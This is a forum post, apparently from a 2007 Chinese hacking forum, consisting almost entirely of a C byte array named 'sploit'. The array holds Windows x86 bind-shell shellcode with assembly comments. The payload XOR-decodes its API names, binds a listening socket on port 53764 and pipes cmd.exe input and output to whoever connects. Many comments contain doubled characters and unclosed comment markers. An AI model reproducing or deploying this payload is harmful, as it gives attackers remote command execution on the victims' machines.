2007-1-19 13:51
unsigned char sploit[580] = {
0x90, 0x8b, 0xfc,/* mov edi,esp
0x33, 0xc0,/* xor eax, eax
0x50,/* push eax*/
0xf7, 0xd0,/* not eax */
0x50,/* push eax*/
0x59,/* pop ecx */
0xf2,/* repnz */
0xaf,/* scasd */
0x59,/* pop ecx */
0xb1, 0xc6,/* mov cl, C6*/
0x8b, 0xc7,/* mov eax, edi*/
/*Xorshellcode *//* */
0x48,/* dec eax */
0x80, 0x30, 0x99,/* xor byte ptr [eax], 99*/
0xe2, 0xfa,/* loop Xorshellcode */
0x33, 0xf6,/* xor esi, esi
0x96,/* xchg eax,esi*/
0xbb,0x99, 0xe8, 0x61, 0x42, /* mov ebx, &LoadLibrary */
0xc1, 0xeb, 0x08,/* shr ebx, 08 */
0x56,/* push esi*/
0xff, 0x13,/* call dword ptr [ebx]*/
0x8b, 0xd0,/* mov edx, eax
0xfc,/* cld */
0x33, 0xc9,/* xor ecx, ecx*/
0xb1, 0x0b,/* mov cl, 0B*/
0x49,/* dec ecx */
/* loadKernelProcess *//* */
0x32, 0xc0,/* xor al, al*/
0xac,/* lodsb */
0x84, 0xc0,/* test al, al */
0x75, 0xf9,/* jne loadKernelProcess */
0x52,/* push edx
0x51,/* push ecx*/
0x56,/* push esi*/
0x52,/* push edx*/
0xb3, 0xe4,/* mov bl, e4&GetProcAddr*/
0xff, 0x13,/* call dword ptr [ebx]*/
0xab,/* stosd */
0x59,/* pop ecx */
0x5a,/* pop edx */
0xe2, 0xec,/* loop loadKernelProcess*/
/* */
0x32, 0xc0,/* xor al, al*/
0xac,/* lodsb */
0x84, 0xc0,/* test al, al */
0x75, 0xf9,/* jne 00000176*/
0xb3, 0xe8,/* mov bl, e8*/
0x56,/* push esi*/
0xff, 0x13,/* call dword ptr [ebx]*/
0x8b, 0xd0,/* mov edx, eax*/
0xfc,/* cld */
0x33, 0xc9,/* xor ecx, ecx*/
0xb1, 0x06,/* mov cl, 06*/
/* loadSocketProcess */
0x32, 0xc0,/* xor al, al*/
0xac,/* lodsb */
0x84, 0xc0,/* test al, al */
0x75, 0xf9,/* jne loadSocketProcess */
0x52,/* push edx*/
0x51,/* push ecx*/
0x56,/* push esi*/
0x52,/* push edx*/
0xb3, 0xe4,/* mov bl, e4*/
0xff, 0x13,/* call dword ptr [ebx]*/
0xab,/* stosd */
0x59,/* pop ecx */
0x5a,/* pop edx */
0xe2, 0xec,/* loop loadSocketProcess*/
0x83, 0xc6, 0x05,/*add esi, 00000005;跳过recv\0,esi指向socksstruc,此时edi=esp+4+sexploit+函数table(16*4) */
0x33, 0xc0,/* xor eax, eax
0x50,/* push eax ;protocol=0
0x40,/* inc eax
0x50,/* push eax;SOCK_STREAM=1
0x40,/* inc eax
0x50,/* push eax;AF_INET=2
0xff, 0x57, 0xe8,/* call [edi-18] ;call socket(2,1,0);
0x93,/* xchg eax,ebx;ebx now contain SOCKET . */
0x6a, 0x10,/* push 00000010 ;length of sockstruc
0x56,/* push esi;address of sockstruc
0x53,/* push ebx;SOCKET
0xff, 0x57, 0xec,/* call [edi-14] ;bind
0x6a, 0x02,/* push 00000002 ;2个连接
0x53,/* push ebx;SOCKET
0xff, 0x57, 0xf0,/* call [edi-10] ;call listen
0x33, 0xc0,/* xor eax, eax
0x57,/* push edi
0x50,/* push eax
0xb0, 0x0c,/* mov al, 0C
0xab,/* stosd
0x58,/* pop eax
0xab,/* stosd
0x40,/* inc eax
0xab,/* stosd ;=true;create SEECURITY_ATTRIBUTES at edi*/
0x5f,/* pop edi
0x48,/* dec eax
0x50,/* push eax;0
0x57,/* push edi;SECURITY_ATTRIBUTES
0x56,/* push esi;to ret write pipe,这个eesi刚才指向sockstruc,现在没有用了,正好放hand*/
0xad,/* lodsd ;esi+4,esi->eax
0x56,/* push esi;to ret read pipe
0xff, 0x57, 0xc0,/* call [edi-40] ;CreatePipe
0x48,/* dec eax
0x50,/* push eax
0x57,/* push edi
0xad,/* lodsd
0x56,/* push esi
0xad,/* lodsd
0x56,/* push esi
0xff, 0x57, 0xc0,/* call [edi-40] ;CreatePipe agaiin */
0x48,/* dec eax
0xb0, 0x44,/* mov al, 44
0x89, 0x07,/* mov dword ptr [edi], eax
0x57,/* push edi
0xff, 0x57, 0xc4,/* call [edi-3C] ;GetStartupInfo, saved aat edi */
0x33, 0xc0,/* xor eax, eax
0x8b, 0x46, 0xf4,/* mov eax, dword ptr [esi-0C]
0x89, 0x47, 0x3c,/* mov dword ptr [edi+3C], eax ;hStdOutput=firsstWrite*/
0x89, 0x47, 0x40,/* mov dword ptr [edi+40], eax ;StdError= firsttWrite */
0x8b, 0x06,/* mov eax, dword ptr [esi]
0x89, 0x47, 0x38,/* mov dword ptr [edi+38], eax ;StdInput=seconddRead*/
0x33, 0xc0,/* xor eax, eax
0x66, 0xb8, 0x01, 0x01,/* mov ax, 0101;
0x89, 0x47, 0x2c,/* mov dword ptr [edi+2C], eax ;dwFlags = STARTTF_USESHOWWINDOW+STARTF_USESTDHANDLES*/
0x57,/* push edi;StartupInfo
0x57,/* push edi;StartupInfo
0x33, 0xc0,/* xor eax, eax
0x50,/* push eax;lpCurrentDirecttory = NULL*/
0x50,/* push eax;lpEnvironment == NULL;*/
0x50,/* push eax;dwCreationFlagss = 0; */
0x40,/* inc eax
0x50,/* push eax;bInheritHandless = true;*/
0x48,/* dec eax
0x50,/* push eax;lpThreadAttribuutes=0;*/
0x50,/* push eax;lpProcessAttribbutes=0; */
0xad,/* lodsd ;
0x56,/* push esi;lpCommandLine=eesi="cmd.exe"*/
0x33, 0xc0,/* xor eax, eax
0x50,/* push eax;lpApplicationNaame=NULL;*/
0xff, 0x57, 0xc8,/* call [edi-38] ;CreateProcessA,,eax=1:ok,0:error. */
0xff, 0x76, 0xf0,/* push [esi-10]
0xff, 0x57, 0xcc,/* call [edi-34]
0xff, 0x76, 0xfc,/* push [esi-04]
0xff, 0x57, 0xcc,/* call [edi-34]
0x48,/* dec eax
0x50,/* push eax;0
0x50,/* push eax;SOCKET
0x53,/* push ebx;accept
0xff, 0x57, 0xf4,/* call [edi-0C] ;ebx contains thhe client SOCKET */
0x8b, 0xd8,/* mov ebx, eax
0x33, 0xc0,/* xor eax, eax
0xb4, 0x04,/* mov ah, 04
0x50,/* push eax;1024
0xc1, 0xe8, 0x04,/* shr eax, 04
0x50,/* push eax;64:GMEM_FIXED+GGMEM_ZEROINIT*/
0xff, 0x57, 0xd4,/* call [edi-2C] ;GlobalAAlloc 1024 */
0x8b, 0xf0,/* mov esi, eax;esi contains thhe buffer*/
/* PeekPipe: */
0x33, 0xc0,/* xor eax, eax
0x8b, 0xc8,/* mov ecx, eax
0xb5, 0x04,/* mov ch, 04
0x50,/* push eax;lpBytesLefttThisMessage =0*/
0x50,/* push eax;lpTotalByteesAvail=0*/
0x57,/* push edi;lpBytesReadd*/
0x51,/* push ecx;nBufferSizee=1024 */
0x56,/* push esi;lpBBuffer */
0xff, 0x77, 0xa8,/* push [edi-58];handle of read pipe */
0xff, 0x57, 0xd0,/* call [edi-30];PeekNamedPPipe */
0x83, 0x3f, 0x01,/* cmp dword ptr [edi], 00000001 ;[edi] contaains bytes to read */
0x7c, 0x22,/* jl GetUserInput ;
0x33, 0xc0,/* xor eax, eax
0x50,/* push eax ;lpOverlappped = NULL */
0x57,/* push edi ;lpNumberOffBytesRead */
0xff, 0x37,/* push dword ptr [edi] ;nNumberOfBBytesToRead*/
0x56,/* push esi ;lpBuffer*/
0xff, 0x77, 0xa8,/* push [edi-58];handle of file to read*/
0xff, 0x57, 0xdc,/* call [edi-24];ReadFile*/
0x0b, 0xc0,/* or eax, eax
0x74, 0x2f,/* je GameOver
0x33, 0xc0,/* xor eax, eax
0x50,/* push eax;flag=0
0xff, 0x37,/* push dword ptr [edi];len
0x56,/* push esi;buf
0x53,/* push ebx;SOCKET
0xff, 0x57, 0xf8,/* call [edi-08] ;send()
0x6a, 0x50,/* push 00000050
0xff, 0x57, 0xe0,/* call [edi-20]
0xeb, 0xc8,/* jmp PeekPipe
/* GetUserInput: */
0x33, 0xc0,/* xor eax, eax
0x50,/* push eax
0xb4, 0x04,/* mov ah, 04;1024
0x50,/* push eax;buf
0x56,/* push esi;SOCKET=2cc*/
0x53,/* push ebx;recv
0xff, 0x57, 0xfc,/* call [edi-04]
0x57,/* push edi;lpOverlappped */
0x33, 0xc9,/* xor ecx, ecx
0x51,/* push ecx;pointer tto number of bytes written */
0x50,/* push eax;nNumberOffBytesToWrite*/
0x56,/* push esi;buf
0xff, 0x77, 0xac,/* push [edi-54] ;writehanddle*/
0xff, 0x57, 0xd8,/* call [edi-28] ;WriteFilee(user-->StdInput) */
0x6a, 0x50,/* push 00000050
0xff, 0x57, 0xe0,/* call [edi-20]
/* GameOver: */
0xeb, 0xaa,/* jmp PeekPipe
0x50,/* push eax
0xff, 0x57, 0xe4,/* call [edi-1C] ;ExitProceess*/
0x90,/* nop
0xd2, 0xdc, 0xcb, 0xd7, 0xdc, 0xd5, 0xaa, 0xab, 0x99,
0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde,
0xfc, 0xed, 0xca, 0xed, 0xf8, 0xeb, 0xed, 0xec, 0xe9, 0xd0, 0xf7, 0xff,
0xf6, 0xd8, 0x99, 0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xeb, 0xf6,
0xfa, 0xfc, 0xea, 0xea, 0xd8, 0x99, 0xda, 0xf5, 0xf6, 0xea, 0xfc, 0xd1,
0xf8, 0xf7, 0xfd, 0xf5, 0xfc, 0x99, 0xc9, 0xfc, 0xfc, 0xf2, 0xd7, 0xf8,
0xf4, 0xfc, 0xfd, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde, 0xf5, 0xf6, 0xfb,
0xf8, 0xf5, 0xd8, 0xf5, 0xf5, 0xf6, 0xfa, 0x99, 0xce, 0xeb, 0xf0, 0xed,
0xfc, 0xdf, 0xf0, 0xf5, 0xfc, 0x99, 0xcb, 0xfc, 0xf8, 0xfd, 0xdf, 0xf0,
0xf5, 0xfc, 0x99, 0xca, 0xf5, 0xfc, 0xfc, 0xe9, 0x99, 0xdc, 0xe1, 0xf0,
0xed, 0xc9, 0xeb, 0xf6, 0xfa, 0xfc, 0xea, 0xea, 0x99, 0xce, 0xca, 0xd6,
0xda, 0xd2, 0xaa, 0xab, 0x99, 0xea, 0xf6, 0xfa, 0xf2, 0xfc, 0xed, 0x99,
0xfb, 0xf0, 0xf7, 0xfd, 0x99, 0xf5, 0xf0, 0xea, 0xed, 0xfc, 0xf7, 0x99,
0xf8, 0xfa, 0xfa, 0xfc, 0xe9, 0xed, 0x99, 0xea, 0xfc, 0xf7, 0xfd, 0x99,
0xeb, 0xfc, 0xfa, 0xef, 0x99, 0x9b, 0x99,
0x4b, 0x9d, // word value for bind port, 4b9d xor 9999h=53764
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99,
0xfa, 0xf4, 0xfd, 0xb7, 0xfc, 0xe1, 0xfc, 0x99, 0xff, 0xff, 0xff, 0xff,
0x0d, 0x0a};
欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/)
Powered by Discuz! 7.2